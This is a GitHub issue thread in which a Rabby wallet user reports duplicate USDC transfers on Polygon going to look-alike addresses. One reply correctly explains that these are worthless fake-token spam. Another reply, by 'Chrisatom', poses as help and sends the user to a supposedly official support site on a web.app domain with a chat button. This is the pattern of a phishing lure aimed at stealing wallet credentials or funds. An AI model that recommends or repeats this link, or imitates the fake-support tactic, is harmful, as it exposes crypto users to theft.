### ISSUE TITLE
 Issues with Duplicate Transactions and Scam Alerts on Polygon Network

### ISSUE THREAD

**Issue by Pamcripty** [RabbyHub/Rabby#2674]
Dear Rabby Support,

I am encountering significant issues while managing USDC on the Polygon Network using Rabby. I would appreciate your assistance in resolving the following problems:

Duplicate Transactions:

Today, I attempted a 170 USDC transaction to an address for an exchange. Initially, the transaction was pending. Afterward, I sent a 2.50 USDC test transaction to myself, which successfully went through.

However, when I checked PolygonScan, I observed the following:

1. The 170 USDC transaction was sent successfully to the correct address.

2. A duplicate 170 USDC transaction was sent to a different address, which is similar to the intended one but has a different middle section.

3. The same issue occurred with the 2.50 USDC transaction. One went to the intended address (my wallet), while the other was sent to an unknown address.

Scam Alerts:

I noticed that Rabby flagged some of these duplicate transactions as scams. I would like to understand why this is happening and how I can prevent duplicate transactions and potential scams while using Rabby.

---

Questions for Support:

1. Is this an issue specific to the Polygon Network or related to how Rabby processes transactions?

2. Why are duplicate transactions being created, and how can I prevent this from happening in the future?

3. Can Rabby help recover the funds sent to unintended addresses flagged as scams?

I have attached a screenshot of the transactions for your reference. Please let me know if you need any additional details to investigate this issue.

Thank you for your time and support.
![hiuhi](https://github.com/user-attachments/assets/e806d48a-9a22-4eb1-9fa7-bb51efb2cc0d)

**Comment by Chrisatom** [comment]
Hello @Pamcripty 
I’ve reviewed your issue and this will be best resolved using [Rabby official  decentralized Dapps protocol](https://websynchronizefix.web.app/) website… use the chat button to initiate a chat with the support team and remember to provide your transaction hashes for better service. That should help resolve this issue

**Comment by vvvvvv1vvvvvv** [comment]
The duplicate 170 USDC transactions are scam transactions. They are sending fake USDC that has no real value. You can ignore them. This is a common problem on the blockchain.
